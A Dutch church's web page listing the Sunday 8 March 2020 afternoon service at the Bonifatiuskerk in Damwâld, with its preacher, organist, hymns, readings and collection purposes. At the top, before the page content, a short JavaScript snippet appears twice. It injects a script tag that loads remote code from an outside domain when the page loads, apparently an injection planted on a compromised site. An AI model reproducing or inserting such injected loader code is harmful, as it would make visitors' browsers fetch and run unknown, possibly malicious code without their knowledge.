;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 maart 2020 14:00 uur - PKN Damwâld
zondag 8 maart 2020
14:00 uur

Kerkdienst zondag 8 maart 2020 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Nlb 68 : 7 en 9
Welkomstwoord
We zingen: Nlb 412 : 1 en 6
Stilgebed, Votum en Groet
We zingen: Nlb 90 : 1 en 6
Geloofsbelijdenis .
We zingen: Nlb 124 : 1 en 4
Gebed
We lezen: Hebr. 5 :11 - 6 : 15
We zingen: Elb 232 : 1 en 2
Preek .
We zingen: Nlb 799 : 1, 5 en 6
Dankgebed en voorbede
Collecte
We zingen: Nlb 769 : 4 en 6
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Als kerk naar de mensen toe

40Dagentijdcollecte: Protestantse Kerk – Missionair Nederland – Als kerk naar de mensen toe
Voor mensen die (bijna) nooit in de kerk komen is het vaak lastig om zomaar een kerkdienst bij te wonen. En hoe kunnen we het evangelie uitdragen wanneer we geen contact hebben met deze mensen? Met pionieren zetten kerken een stap naar buiten. Niet de mensen naar de kerk laten komen, maar als kerk naar de mensen toe gaan. Pioniers zoeken naar nieuwe vormen van kerk zijn die passen bij de context en de mensen die ze ontmoeten buiten de kerk. Zij vormen een nieuwe christelijke geloofsgemeenschap waarbij de boodschap van het evangelie niet losgelaten, maar wel op een andere manier gedeeld wordt. De Protestantse Kerk ondersteunt startende pioniersplekken

Tweede collecte: Kerk
Uitganscollecte: Kerk